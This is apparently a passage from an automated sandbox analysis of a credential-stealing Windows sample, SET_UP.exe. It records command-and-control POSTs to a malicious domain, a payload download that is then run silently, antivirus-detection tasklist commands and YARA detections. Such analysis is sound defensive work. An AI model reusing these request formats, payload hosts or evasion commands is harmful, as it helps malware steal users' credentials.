                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=agb6r95a4v6nkc74fj01uehakv; expires=Sun, 20 Apr 2025 15:04:03 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2%2B8haBTAgcxhoXCR1co9Pz8o0y7VpOoTEZAgWRy7LtEoEHy2r453o1eWfy0UTqrxsyrU6A7slthk%2FWv0NOmVTzioJurQp%2Bn4GQao59Yj2kJ00MMjx2WRvRMSdH%2FXeRNtJlkDsVk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdb93492a4400-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1782&min_rtt=1662&rtt_var=709&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2124&delivery_rate=1756919&cwnd=155&unsent_bytes=0&cid=d0a90461d8678ff0&ts=759&x=0"
2024-12-25 21:17:24 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-25 21:17:24 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.4 | 49741 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:26 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: multipart/form-data; boundary=3ZX9UNNKS
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1053
                                                                                                                                          Host: laborersquei.click
2024-12-25 21:17:26 UTC | 1053 | OUT | Data Ascii: --3ZX9UNNKSContent-Disposition: form-data; name="hwid"5A07173700CEBA178B85154C9421A187--3ZX9UNNKSContent-Disposition: form-data; name="pid"1--3ZX9UNNKSContent-Disposition: form-data; name="lid"hRjzG3--ELVIRA--3ZX9UNNKSContent-Dis
2024-12-25 21:17:27 UTC | 1129 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:26 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=ruqr926luok1kab3cte3epf5tf; expires=Sun, 20 Apr 2025 15:04:05 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JQS9YkD%2BbdJ4h7KbYcLj9D%2FUhqMu%2BOEfLC2U5l44cMH0L1jaP3gncLdHopuTKcE1bVQCnyg2bL98Ze5DN26%2FcKJ7BQ0Q6OLiVcxiJP0E4MwOAo2wOlHoX7mmiiuaigHwL18PTHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdba06fa44344-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1745&rtt_var=677&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1963&delivery_rate=1673352&cwnd=47&unsent_bytes=0&cid=52461f7735d5c4ed&ts=838&x=0"
2024-12-25 21:17:27 UTC | 20 | IN | Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
Data Ascii: fok 8.46.123.189
2024-12-25 21:17:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.4 | 49743 | 104.21.89.250 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:28 UTC | 267 | OUT | POST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 115
                                                                                                                                          Host: laborersquei.click
2024-12-25 21:17:28 UTC | 115 | OUT | Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ELVIRA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=5A07173700CEBA178B85154C9421A187
2024-12-25 21:17:29 UTC | 1130 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:28 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=mv2s2vbo5p47ekadolc5jcolbe; expires=Sun, 20 Apr 2025 15:04:07 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H7N7SCahw32xgk0yXsfHwpRmcyTm9Blr4EdEe0DN08HiFzwUUbsHGSnvbjY9GDAmmwgfrNE5IAt8iSjTof%2Bxv5PcfT5LsU5ztrLlGV3%2FjOYn2RhAp%2B0PpHQbN0gbZi2%2BsmXrJIo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdbaddaab4211-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1556&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=1018&delivery_rate=1719670&cwnd=239&unsent_bytes=0&cid=d75e70208619f607&ts=779&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49744 | 172.67.214.186 | 443 | 6556 | C:\Users\user\Desktop\SET_UP.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-25 21:17:31 UTC | 206 | OUT | GET /int_clp_sha.txt HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Host: klipsyzogey.shop
2024-12-25 21:17:31 UTC | 901 | IN | HTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 25 Dec 2024 21:17:31 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 8371434
                                                                                                                                          Connection: close
                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                          ETag: "2a2989ed741c431f4a3276264f7bdb61"
                                                                                                                                          Last-Modified: Wed, 25 Dec 2024 17:25:54 GMT
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZRg3UpYEoVtlnXe5b%2FchEc9m0SqnU5%2FHJesCNSeR2Qo775vRd4%2BA3egpPEP40GqxMltAARvrvRSxs0OADspMyrCOVm6tE6XdDuEAHE87ptsskMfiY2d6sFHIrmTbdhQcEct"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8f7bdbbea8fa436e-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2013&min_rtt=2005&rtt_var=768&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2867&recv_bytes=820&delivery_rate=1409946&cwnd=237&unsent_bytes=0&cid=b2b8c1eda8171b27&ts=639&x=0"


                                                                                                                                          Target ID:0
                                                                                                                                          Start time:16:16:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\SET_UP.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\SET_UP.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:74'139'832 bytes
                                                                                                                                          MD5 hash:117C82DB1BC3C31C9196BD4A949F3358
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2100372442.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1876587770.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1826911184.0000000000899000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1897227227.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:16:17:44
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                                                                                                                                          Imagebase:0x320000
                                                                                                                                          File size:8'371'434 bytes
                                                                                                                                          MD5 hash:2A2989ED741C431F4A3276264F7BDB61
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:16:17:45
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$20426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe"
                                                                                                                                          Imagebase:0x8c0000
                                                                                                                                          File size:3'367'424 bytes
                                                                                                                                          MD5 hash:A62041070E18901131CBBE7825EC4EC7
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:16:17:46
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                                                                                                                                          Imagebase:0x320000
                                                                                                                                          File size:8'371'434 bytes
                                                                                                                                          MD5 hash:2A2989ED741C431F4A3276264F7BDB61
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

Target ID:7
Start time:16:17:47
Start date:25/12/2024
Path:C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
Wow64 process (32bit):true
Commandline:"C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp" /SL5="$30426,7416882,845824,C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
Imagebase:0x8e0000
File size:3'367'424 bytes
MD5 hash:A62041070E18901131CBBE7825EC4EC7
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000003.2293843395.00000000082F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:low
Has exited:true

Target ID:8
Start time:16:17:50
Start date:25/12/2024
Path:C:\Windows\System32\timeout.exe
Wow64 process (32bit):true
Commandline:"timeout" 9
Imagebase:0x800000
File size:32'768 bytes
MD5 hash:100065E21CFBBDE57CBA2838921F84D6
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:9
Start time:16:17:50
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Imagebase:0x7ff65f9f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Imagebase:0x7ff6abfd0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "wrsa.exe"
Imagebase:0x7ff628a60000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:14
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Imagebase:0x7ff65f9f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:15
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Imagebase:0x7ff6abfd0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\find.exe
Wow64 process (32bit):false
Commandline:find /I "opssvc.exe"
Imagebase:0x7ff628a60000
File size:17'920 bytes
MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Imagebase:0x7ff65f9f0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:16:17:59
Start date:25/12/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Imagebase:0x7ff6abfd0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                          Target ID:21
                                                                                                                                          Start time:16:17:59
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "avastui.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:22
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:23
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:24
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:25
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "avgui.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:26
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:27
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:28
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:29
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "nswscsvc.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:30
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                          Imagebase:0x7ff65f9f0000
                                                                                                                                          File size:289'792 bytes
                                                                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:31
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:32
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\tasklist.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                          Imagebase:0x7ff6abfd0000
                                                                                                                                          File size:106'496 bytes
                                                                                                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:33
                                                                                                                                          Start time:16:18:00
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Windows\System32\find.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:find /I "sophoshealth.exe"
                                                                                                                                          Imagebase:0x7ff628a60000
                                                                                                                                          File size:17'920 bytes
                                                                                                                                          MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:34
                                                                                                                                          Start time:16:18:03
                                                                                                                                          Start date:25/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:167'432 bytes
                                                                                                                                          MD5 hash:0588CE0C39DA3283E779C1D5B21D283B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000022.00000002.2346383362.0000000050001000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000022.00000002.2326879519.0000000009316000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Has exited:true


                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.2%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:41%
                                                                                                                                            Total number of Nodes:117
                                                                                                                                            Total number of Limit Nodes:11
                                                                                                                                            APIs
